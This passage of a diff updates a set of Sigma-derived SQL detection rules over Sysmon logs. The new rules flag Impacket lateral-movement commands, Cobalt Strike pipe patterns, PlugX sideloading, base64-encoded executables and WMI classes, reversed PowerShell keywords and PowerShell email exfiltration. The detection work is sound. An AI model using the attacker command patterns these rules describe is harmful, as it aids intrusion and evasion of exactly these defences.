"SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR 
ParentImage LIKE '%\\\\mmc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\127.0.0.1\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\' OR ParentCommandLine LIKE '%taskeng.exe%' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_dbgcore_dll.yml" + "filename": "proc_creation_win_hktl_impacket_lateral_movement.yml" }, { - "title": "Active Directory Parsing DLL Loaded Via Office Applications", - "id": "a2a3b925-7bb0-433b-b508-db9003263cc4", - "status": "test", - "description": "Detects DSParse DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Wab/Wabmig Unusual Parent Or Child Processes", + "id": "63d1ccc0-2a43-4f4b-9289-361b308991ff", + "status": "experimental", + "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Legitimate macro usage. 
Add the appropriate filter according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\dsparse.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (Image LIKE '%\\\\wab.exe' ESCAPE '\\' OR Image LIKE '%\\\\wabmig.exe' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wabmig.exe' ESCAPE '\\')))" ], - "filename": "image_load_office_dsparse_dll_load.yml" + "filename": "proc_creation_win_wab_unusual_parents.yml" }, { - "title": "Microsoft VBA For Outlook Addin Loaded Via Outlook", - "id": "9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed", + "title": "Suspicious Service Binary Directory", + "id": "883faa95-175a-4e22-8181-e5761aeb373c", "status": "test", - "description": "Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a service binary running in a suspicious directory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Legitimate macro usage. 
Add the appropriate filter according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\outlook.exe' ESCAPE '\\' AND ImageLoaded LIKE '\\\\outlvba.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\$Recycle.bin%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') AND (ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\'))" ], - "filename": "image_load_office_outlook_outlvba_load.yml" + "filename": "proc_creation_win_susp_service_dir.yml" }, { - "title": "CLR DLL Loaded Via Office Applications", - "id": "d13c43f0-f66b-4279-8b2c-5912077c1780", - "status": "test", - "description": "Detects CLR DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Potential CobaltStrike Process Patterns", + "id": "f35c5d71-b489-4e22-a115-f003df287317", + "status": "experimental", + "description": "Detects potential process patterns related to Cobalt Strike beacon activity", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1204.002" + "attack.t1059" ], "falsepositives": [ - "Legitimate macro usage. 
Add the appropriate filter according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\clr.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%cmd.exe /C whoami' ESCAPE '\\' AND ParentImage LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\runonce.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe /c echo%' ESCAPE '\\' AND CommandLine LIKE '%> \\\\\\\\.\\\\pipe%' ESCAPE '\\') OR (ParentCommandLine LIKE '%cmd.exe /C echo%' ESCAPE '\\' AND ParentCommandLine LIKE '% > \\\\\\\\.\\\\pipe%' ESCAPE '\\' AND CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1' ESCAPE '\\') OR (ParentCommandLine LIKE '%/C whoami' ESCAPE '\\' AND CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1' ESCAPE '\\')))" ], - "filename": "image_load_office_dotnet_clr_dll_load.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_process_patterns.yml" }, { - "title": "GAC DLL Loaded Via Office Applications", - "id": "90217a70-13fc-48e4-b3db-0d836c5824ac", - "status": "test", - "description": "Detects any GAC DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Griffon Malware Attack Pattern", + "id": "bcc6f179-11cd-4111-a9a6-0fab68515cf7", + "status": "experimental", + "description": "Detects process execution patterns related to Griffon malware as reported by Kaspersky", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - 
"attack.t1204.002" + "attack.execution" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\assembly\\\\GAC\\_MSIL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\local\\\\temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%//b /e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\')" ], - "filename": "image_load_office_dotnet_gac_dll_load.yml" + "filename": "proc_creation_win_malware_griffon_patterns.yml" }, { - "title": "Potential DCOM InternetExplorer.Application DLL Hijack - Image Load", - "id": "f354eba5-623b-450f-b073-0b5b2773b6aa", + "title": "Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE", + "id": "37db85d1-b089-490a-a59a-c7b6f984f480", "status": "test", - "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "description": "Detects usage of \"findstr\" with the argument \"385201\". 
Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.discovery", + "attack.t1518.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '% 385201%' ESCAPE '\\')" ], - "filename": "image_load_dcom_iertutil_dll_hijack.yml" + "filename": "proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml" }, { - "title": "UAC Bypass With Fake DLL", - "id": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", - "status": "test", - "description": "Attempts to load dismcore.dll after dropping it", - "author": "oscd.community, Dmitry Uchakin", + "title": "Suspicious Shells Spawn by Java Utility Keytool", + "id": "90fb5e62-ca1f-4e22-b42e-cc521874c938", + "status": "experimental", + "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. 
adselfservice plus exploitation)", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ + "attack.initial_access", "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1574.002" + "attack.privilege_escalation" ], "falsepositives": [ - "Actions of a legitimate telnet client" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dism.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\Dism\\\\dismcore.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\keytool.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "image_load_uac_bypass_via_dism.yml" + "filename": 
"proc_creation_win_java_keytool_susp_child_process.yml" }, { - "title": "Fax Service DLL Search Order Hijack", - "id": "828af599-4c53-4ed2-ba4a-a9f835c434ea", - "status": "test", - "description": "The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.", - "author": "NVISO", + "title": "Base64 MZ Header In CommandLine", + "id": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", + "status": "experimental", + "description": "Detects encoded base64 MZ header in the commandline", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.001", - "attack.t1574.002" + "attack.execution" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fxssvc.exe' ESCAPE '\\' AND ImageLoaded LIKE '%ualapi.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR CommandLine LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR CommandLine LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_ualapi.yml" + "filename": "proc_creation_win_susp_inline_base64_mz_header.yml" }, { - "title": "Microsoft Office DLL Sideload", - "id": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", - "status": "experimental", - "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "title": "Potential PlugX Activity", + "id": "aeab5ec5-be14-471a-80e8-e344418305c2", + "status": "test", + 
"description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.s0013", "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", "attack.t1574.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\outllib.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((((((((((Image LIKE '%\\\\CamMute.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Lenovo\\\\Communication Utility\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\chrome\\_frame\\_helper.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Google\\\\Chrome\\\\application\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\dvcemumanager.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Microsoft Device Emulator\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\Gadget.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Windows Media Player\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\hcc.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\HTML Help Workshop\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\hkcmd.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\SysNative\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\SysWow64\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\Mc.exe' ESCAPE '\\' AND NOT ((Image 
LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\')))) OR (Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Defender\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AntiMalware\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\msseces.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Security Center\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft Security Essentials\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\OInfoP11.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Common Files\\\\Microsoft Shared\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\OleView.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\rc.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.NET\\\\%' ESCAPE '\\')))))" ], - "filename": "image_load_side_load_office_dlls.yml" + "filename": "proc_creation_win_malware_plugx_susp_exe_locations.yml" }, { - "title": "Suspicious Volume Shadow Copy Vsstrace.dll Load", - "id": "48bfd177-7cf2-412b-ad77-baf923489e82", + "title": "PowerShell Base64 Encoded WMI Classes", + "id": "1816994b-42e1-4fb1-afd2-134d88184f71", "status": "experimental", - "description": "Detects the image load of VSS DLL by uncommon executables", - "author": "frack113", + "description": "Detects calls to base64 encoded WMI class such as \"Win32_Shadowcopy\", \"Win32_ScheduledJob\", etc.", + "author": "Christian Burkard (Nextron Systems), Nasreddine 
Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2hhZG93Y29we%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NoYWRvd2NvcH%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TaGFkb3djb3B5%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2NoZWR1bGVkSm9i%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NjaGVkdWxlZEpvY%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TY2hlZHVsZWRKb2%' ESCAPE '\\') OR 
(CommandLine LIKE '%VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfUHJvY2Vzc%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1Byb2Nlc3%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Qcm9jZXNz%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfVXNlckFjY291bn%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1VzZXJBY2NvdW50%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Vc2VyQWNjb3Vud%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfTG9nZ2VkT25Vc2Vy%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX0xvZ2dlZE9uVXNlc%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Mb2dnZWRPblVzZX%' ESCAPE '\\')))" ], - "filename": "image_load_dll_vsstrace_susp_load.yml" + "filename": "proc_creation_win_powershell_base64_wmi_classes.yml" }, { - "title": "Pingback Backdoor DLL Loading Activity", - "id": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", - "status": "experimental", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Potential PowerShell Obfuscation Via Reversed Commands", + "id": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", + "status": "test", + "description": "Detects the presence of reversed PowerShell commands in the CommandLine. 
This is often used as a method of obfuscation by attackers", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdtc.exe' ESCAPE '\\' AND ImageLoaded LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%hctac%' ESCAPE '\\' OR CommandLine LIKE '%kaerb%' ESCAPE '\\' OR CommandLine LIKE '%dnammoc%' ESCAPE '\\' OR CommandLine LIKE '%ekovn%' ESCAPE '\\' OR CommandLine LIKE '%eliFd%' ESCAPE '\\' OR CommandLine LIKE '%rahc%' ESCAPE '\\' OR CommandLine LIKE '%etirw%' ESCAPE '\\' OR CommandLine LIKE '%golon%' ESCAPE '\\' OR CommandLine LIKE '%tninon%' ESCAPE '\\' OR CommandLine LIKE '%eddih%' ESCAPE '\\' OR CommandLine LIKE '%tpircS%' ESCAPE '\\' OR CommandLine LIKE '%ssecorp%' ESCAPE '\\' OR CommandLine LIKE '%llehsrewop%' ESCAPE '\\' OR CommandLine LIKE '%esnopser%' ESCAPE '\\' OR CommandLine LIKE '%daolnwod%' ESCAPE '\\' OR CommandLine LIKE '%tneilCbeW%' ESCAPE '\\' OR CommandLine LIKE '%tneilc%' ESCAPE '\\' OR CommandLine LIKE '%ptth%' ESCAPE '\\' OR CommandLine LIKE '%elifotevas%' ESCAPE '\\' OR CommandLine LIKE '%46esab%' ESCAPE '\\' OR CommandLine LIKE '%htaPpmeTteG%' ESCAPE '\\' OR CommandLine LIKE '%tcejbO%' ESCAPE '\\' OR CommandLine LIKE '%maerts%' ESCAPE '\\' OR CommandLine LIKE '%hcaerof%' ESCAPE '\\' OR CommandLine LIKE '%retupmoc%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine 
LIKE '%-EncodedCommand%' ESCAPE '\\' AND CommandLine LIKE '%rahc%' ESCAPE '\\')))" ], - "filename": "image_load_malware_pingback_backdoor.yml" + "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml" }, { - "title": "WMI Persistence - Command Line Event Consumer", - "id": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", - "status": "test", - "description": "Detects WMI command line event consumers", - "author": "Thomas Patzke", + "title": "Email Exifiltration Via Powershell", + "id": "312d0384-401c-4b8b-abdf-685ffba9a332", + "status": "experimental", + "description": "Detects email exfiltration via powershell cmdlets", + "author": "Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)", "tags": [ - "attack.t1546.003", - "attack.persistence" + "attack.exfiltration" ], "falsepositives": [ - "Unknown (data set is too small; further testing needed)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbemcons.dll' ESCAPE 